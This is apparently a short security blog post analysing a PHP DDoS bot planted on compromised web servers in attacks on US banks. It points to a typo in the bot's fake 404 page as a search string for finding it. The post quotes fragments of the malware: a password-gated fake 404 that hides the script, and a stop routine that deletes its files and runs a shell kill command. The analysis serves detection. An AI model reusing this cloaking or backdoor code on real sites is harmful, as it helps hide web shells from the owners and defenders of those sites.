Just recently the BSI warned about an ongoing attack to US Banks.
The php-script involved showed a “404” Error when called without any
arguments.
A closer looks shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in google or wherever..
and bingo: some other victom already posted the source code
of the infected webserver:
Here we can see that a POST action “stop” makes the DDoS go away..
function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}
And here is where the typo sits:
if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found
Not Found
The requested URL ".$_SERVER['PHP_SELF']." was not found on this server
Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request
";
die();
exit();
}